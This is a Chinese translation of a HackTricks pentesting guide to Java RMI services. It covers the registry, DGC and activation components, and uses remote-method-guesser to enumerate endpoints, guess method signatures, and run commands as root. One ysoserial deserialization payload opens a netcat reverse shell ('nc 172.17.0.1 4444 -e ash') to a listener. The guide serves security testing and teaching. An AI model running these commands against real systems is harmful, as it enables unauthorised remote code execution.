18 KiB
1098/1099/1050 - 渗透测试 Java RMI - RMI-IIOP
从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版的 HackTricks,请查看订阅计划!
- 获取官方 PEASS & HackTricks 商品
- 探索PEASS 家族,我们的独家NFTs
- 加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @carlospolopm** 上关注**我们。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。
使用 Trickest 可以轻松构建和自动化工作流程,使用世界上最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
基本信息
Java 远程方法调用,或 Java RMI,是一种面向对象的 RPC 机制,允许一个位于一个 _Java 虚拟机_中的对象调用另一个 _Java 虚拟机_中的对象上的方法。这使开发人员能够使用面向对象的范例编写分布式应用程序。可以在此黑帽演讲中找到从攻击者角度的 Java RMI 的简短介绍。
默认端口: 1090,1098,1099,1199,4443-4446,8999-9010,9999
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
通常,只有默认的_Java RMI_组件(RMI Registry_和_Activation System)绑定到常见端口。实现实际_Java RMI_应用程序的_远程对象_通常绑定到随机端口,如上所示的输出。
_nmap_有时会在识别受_SSL保护的_RMI_服务时遇到问题。如果在常见_RMI_端口上遇到未知的ssl服务,应进一步调查。
RMI组件
简单来说,Java RMI_允许开发人员在网络上提供一个_Java对象。这会打开一个_TCP_端口,客户端可以连接并调用相应对象上的方法。尽管听起来很简单,但_Java RMI_需要解决几个挑战:
- 通过_Java RMI_分派方法调用,客户端需要知道目标对象的IP地址、监听端口、实现的类或接口以及
ObjID
(ObjID
是在对象在网络上可用时创建的唯一随机标识符。它是必需的,因为_Java RMI_允许多个对象在同一个_TCP_端口上监听)。 - 远程客户端可能通过调用暴露对象上的方法在服务器上分配资源。_Java虚拟机_需要跟踪这些资源中哪些仍在使用,哪些可以进行垃圾回收。
第一个挑战由_RMI注册表_解决,它基本上是_Java RMI_的命名服务。RMI注册表_本身也是一个_RMI服务,但实现的接口和ObjID
是固定的,并且所有_RMI_客户端都知道。这使_RMI_客户端可以通过知道相应的_TCP_端口来使用_RMI注册表。
当开发人员希望将他们的_Java对象_在网络中提供时,他们通常将它们绑定到_RMI注册表_。注册表_存储了连接到对象所需的所有信息(IP地址、监听端口、实现的类或接口和ObjID
值),并将其提供在一个人类可读的名称下(绑定名称)。想要消费_RMI服务_的客户端向_RMI注册表_请求相应的_绑定名称,注册表返回所有连接所需的信息。因此,情况基本上与普通_DNS_服务相同。以下清单显示了一个小例子:
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;
public class ExampleClient {
private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";
public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name
String response = ref.remoteMethod(); // Call a remote method
} catch( Exception e) {
e.printStackTrace();
}
}
}
上述挑战的第二个问题是通过分布式垃圾收集器(Distributed Garbage Collector,DGC)解决的。这是另一个具有众所周知的ObjID
值的RMI服务,基本上每个RMI端点上都可以找到它。当RMI客户端开始使用RMI服务时,它会向DGC发送一个信息,说明相应的远程对象正在使用中。DGC然后可以跟踪引用计数,并能够清理未使用的对象。
连同已弃用的激活系统一起,这些是Java RMI的三个默认组件:
- RMI注册表(
ObjID = 0
) - 激活系统(
ObjID = 1
) - 分布式垃圾收集器(
ObjID = 2
)
Java RMI的默认组件长期以来一直是已知的攻击向量,并且在过时的Java版本中存在多个漏洞。从攻击者的角度来看,这些默认组件很有趣,因为它们实现了已知的类/接口,很容易与它们进行交互。对于自定义RMI服务,情况则有所不同。要调用远程对象上的方法,您需要事先知道相应的方法签名。如果不知道现有方法签名,就无法与RMI服务进行通信。
RMI枚举
remote-method-guesser是一个Java RMI漏洞扫描器,能够自动识别常见的RMI漏洞。每当您识别到一个RMI端点时,都应该尝试使用它:
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] - http://iinsecure.dev/well-hidden-development-folder/
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] --> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] - Caught ClassNotFoundException during lookup call.
[+] --> The type java.lang.String is unmarshalled via readObject().
[+] Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] - Caught MalformedURLException during lookup call.
[+] --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] - Caught NotBoundException during unbind call (unbind was accepeted).
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] - Security Manager rejected access to the class loader.
[+] --> The server does use a Security Manager.
[+] Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] - DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] - Caught IllegalArgumentException during activate call (activator is present).
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
枚举操作的输出在项目的文档页面中有更详细的解释。根据结果,您应该尝试验证已识别的漏洞。
_remote-method-guesser_显示的ObjID
值可用于确定服务的正常运行时间。这可能有助于识别其他漏洞:
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: -4004948013687638236
[+] UID:
[+] Unique: 1442798173
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
强制破解远程方法
即使在枚举过程中未发现漏洞,可用的 RMI 服务仍可能暴露危险函数。此外,尽管 RMI 通信到 RMI 默认组件受到反序列化过滤器的保护,但与自定义 RMI 服务通信时,通常不会设置此类过滤器。因此,了解 RMI 服务上的有效方法签名非常有价值。
不幸的是,Java RMI 不支持枚举 远程对象 上的方法。尽管如此,可以使用诸如 remote-method-guesser 或 rmiscout 等工具来强制破解方法签名:
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] MethodGuesser is running:
[+] --------------------------------
[+] [ plain-server2 ] HIT! Method with signature String execute(String dummy) exists!
[+] [ plain-server2 ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] [ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] [6562 / 6562] [#####################################] 100%
[+] done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] - plain-server2 == plain-server
[+] --> String execute(String dummy)
[+] --> String system(String dummy, String[] dummy2)
[+] - legacy-service
[+] --> void logMessage(int dummy1, String dummy2)
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
已识别的方法可以这样调用:
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
或者您可以执行类似这样的反序列化攻击:
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] Using non primitive argument type java.lang.String on position 0
[+] Specified method signature is String execute(String dummy)
[+]
[+] Caught ClassNotFoundException during deserialization attack.
[+] Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] Deserialization attack probably worked :)
$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
以下文章中可以找到更多信息:
除了猜测之外,您还应该在搜索引擎或GitHub中查找遇到的RMI服务的接口甚至实现。这里的绑定名称和实现类或接口的名称可能会有所帮助。
已知接口
remote-method-guesser会将类或接口标记为known
,如果它们在该工具的已知RMI服务的内部数据库中列出。在这些情况下,您可以使用known
操作来获取有关相应RMI服务的更多信息:
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] - jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] Endpoint: localhost:41695 TLS: no ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] JMX Server
[+]
[+] Class Name:
[+] - javax.management.remote.rmi.RMIServerImpl_Stub
[+] - javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] - String getVersion()
[+] - javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] -----------------------------------
[+] Name:
[+] MLet
[+]
[+] Description:
[+] MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] is therefore most of the time equivalent to remote code execution.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
[+]
[+] -----------------------------------
[+] Name:
[+] Deserialization
[+]
[+] Description:
[+] Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
Shodan
port:1099 java
工具
参考资料
HackTricks 自动命令
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
Entry_1:
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
使用Trickest轻松构建并由全球最先进的社区工具驱动的自动化工作流程。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。